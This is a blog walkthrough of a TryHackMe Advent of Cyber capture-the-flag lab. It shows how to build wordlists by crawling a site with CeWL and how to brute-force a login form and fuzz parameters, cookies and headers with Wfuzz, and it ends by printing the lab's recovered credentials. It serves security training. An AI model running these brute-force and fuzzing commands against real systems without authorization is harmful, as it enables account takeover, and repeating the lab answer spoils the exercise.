Walkthrough of TryHackMe’s Advent of Cyber 2023 Day 4

Hello Cyber Enthusiats! How are you doing?

Well, I’m ready with a new walkthrough of the Advent of Cyber 2023 day 4 challenges. Here is the link to this room : https://tryhackme.com/room/adventofcyber2023 .

This room is about creating your custom wordlist with the CeWL tool and brute forcing /login.php with the Wfuzz tool. This is a beginner friendly room, and the challenges are also easy to do. 

You can follow along with the instructions they have given, and you’ll get the flag easily. So, first, understand why we need to create our own custom wordlist. 

Because when we create our own wordlist, it lets us focus on the specific details of our target and increases the chances of finding relevant passwords.

Many tools are available to create your own custom wordlist, like CeWL, Crunch, Dymerge, and Cupp. We’re going to explore the CeWL tool because we’ll be using it to solve the challenges.

CeWL (Custom Word List Generator) is a Ruby program that crawls a URL to a defined depth and produces a list of keywords that can be used as a wordlist.

This tool is designed to create custom wordlists by scraping or spidering a target website for words, phrases, and patterns found in its content. 

And we can also configure it to include or exclude certain types of words, specify word length, and perform other customizations.

You can download this tool from here : https://github.com/digininja/CeWL .Or execute this command in the terminal of your kali linux.

sudo apt-get install cewl -y

It’s enough introduction to the CeWL tool. Now let’s explore the basic commands that you can run to create your own custom wordlist.

The basic command is:

cewl http://xyz.com

It analyzes the webpage, extracts words, and creates a wordlist.

cewl -w custom_wordlist.txt --min_word_length=6 http://xyz.com

It specifies a minimum word length of 6 characters and saves the generated wordlist to a file named “custom_wordlist.txt”.

cewl -w custom_wordlist.txt --exclude_common http://xyz.com

–exclude_common option instructs CeWL to exclude common words, enhancing the list with potentially more unique and relevant terms.

cewl -w custom_wordlist.txt --depth=3 http://xyz.com
                                             Or 
cewl -w custom_wordlist.txt -d 3 http://xyz.com

–depth=3 option sets the crawling depth, indicating CeWL to analyze content up to three levels deep on the website for word extraction.

cewl -w custom_wordlist.txt --exclude "word1,word2" http://xyz.com

Generates a custom wordlist from “http://xyz.com”. The –exclude option specifies words (word1, word2) to be excluded from the generated wordlist.

cewl -w custom_wordlist.txt --format=json http://xyz.com

Creates a custom wordlist from “http://xyz.com” and saves it in JSON format. 

You can also see other options and use them for your needs by executing the given command. 

cewl –help

• Specify spidering depth: The -d option allows you to set how deep CeWL should spider. For xyz, to spider two links deep: cewl http://MACHINE_IP -d 2 -w output1.txt
• Set minimum and maximum word length: Use the -m and -x options respectively. For instance, to get words between 5 and 10 characters: cewl http://MACHINE_IP -m 5 -x 10 -w output2.txt
• Handle authentication: If the target site is behind a login, you can use the -a flag for form-based authentication.
• Custom extensions: The –with-numbers option will append numbers to words, and using –extension allows you to append custom extensions to each word, making it useful for directory or file brute-forcing.
• Follow external links: By default, CeWL doesn’t spider external sites, but using the –offsite option allows you to do so.

Another tool they have used in this room is Wfuzz. 

Wfuzz is a tool designed for brute-forcing web applications. You can use this tool to find resources, not linked directories, servlets, scripts, etc.

We can also brute-force GET and POST parameters for checking different kinds of injections (SQL, XSS, LDAP), brute-force forms parameters (user/password) and parameter fuzzing.

 It facilitates the identification of potential security flaws by injecting payloads and analyzing the responses received from the target web application. 

Wfuzz could help you secure your web applications by finding and exploiting web application vulnerabilities. Wfuzz’s web application vulnerability scanner is supported by plugins.

Wfuzz is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Building plugins is simple and takes little more than a few minutes.

Wfuzz exposes a simple language interface to the previous HTTP requests/responses performed using Wfuzz or other tools, such as Burp. This allows you to perform manual and semi-automatic tests with full context and understanding of your actions without relying on a web application scanner's underlying implementation.

You can download the Wfuzz tool from this link. https://github.com/xmendez/wfuzz.git 

Or execute this command 

pip3 install wfuzz

You can see different options that you can use as per your needs.

wfuzz -h or wfuzz --help

The basic command we can use 

wfuzz -c -z payload.txt -d "param1=FUZZ&param2=value" -u "http://example.com/page"

-c: Colorize output
-z payload.txt: Specify a wordlist (e.g., wordlist)
-d “param1=FUZZ&param2=value”: Specify data for the POST request
-u “http://example.com/page”: Specify the target URL

wfuzz -c -z payload.txt -u "http://example.com/page?param=FUZZ"

Perform a GET request with payloads on the specified parameter.

wfuzz -c -z payload.txt -d "param=FUZZ" -u "http://example.com/page"

Perform a POST request with payloads on the specified parameter.

wfuzz -c -z payload.txt -H "Cookie: session=FUZZ" -u "http://example.com/page"

Inject payloads into the session cookie.

wfuzz -c -z payload.txt -H "CustomHeader: FUZZ" -u "http://example.com/page"

Inject payloads into a custom header.

wfuzz -c -z file,/path/to/filenames.txt -u "http://example.com/page?file=FUZZ"

Test for file inclusion vulnerabilities.

wfuzz -c --hh 2 -z payload.txt --method FUZZ -u "http://example.com/page"

Brute force HTTP methods (GET, POST, PUT, DELETE, etc.).

wfuzz -c --hw 1 -z payload.txt --follow -u "http://example.com/page?redirect=FUZZ"

Test for URL redirection vulnerabilities.

Now let’s move to the given challenge. First start the target machine and Attackbox.

Copy the machine ip address and then open the browser in Attackbox and visit to http://machine_ip 

You will get this web page; explore the whole page. When you click on Employee Portal, you will get a login page.

When I tried to input a random username and password, it told us, “Please enter the correct login credentials”.

So now let’s create our own custom wordlist, and then we’ll bruteforce this page to get the correct credentials.

We need two wordlists, users.txt for the usernames and passwords.txt for the passwords. 

So let’s create them

cewl -d 2 -m 5 -w passwords.txt http://machine_ip --with-numbers

It will create a password wordlist for us with a minimum length of 5 digit passwords, including numbers.

Now create another wordlist for users. 

cewl -d 0 -m 5 -w users.txt http://machine_ip/team.php --lowercase

We are extracting user names from the team.php page because there is a high chance of usernames present. 

And we have our username wordlist.

Both wordlists are ready. Now we can proceed with brute forcing. And we’ll use the wfuzz tool for the same. 

wfuzz -c -z file,users.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://MACHINE_IP/login.php -d "username=FUZZ&password=FUZ2Z"

-z file,usernames.txt loads the usernames list.
-z file,passwords.txt uses the password list generated by CeWL.
–hs “Please enter the correct credentials” hides responses containing the string “Please enter the correct credentials”, which is the message displayed for wrong login attempts.
-u specifies the target URL.
-d “username=FUZZ&password=FUZ2Z” provides the POST data format where FUZZ will be replaced by usernames and FUZ2Z by passwords.

We get our username and password isalas:Happiness.

Let’s login to the webpage. We get this page.

In the second message, we can see that there is some confidential message. When we open it, we get our flag.

Here, we have completed both challenges of this room. We’ll continuously bring walkthroughs for challenges every day. 

Never forget to check out our Youtube channel, Ethical Empire. If you have any doubts, you can connect with me on LinkedIn and feel free to resolve your doubts.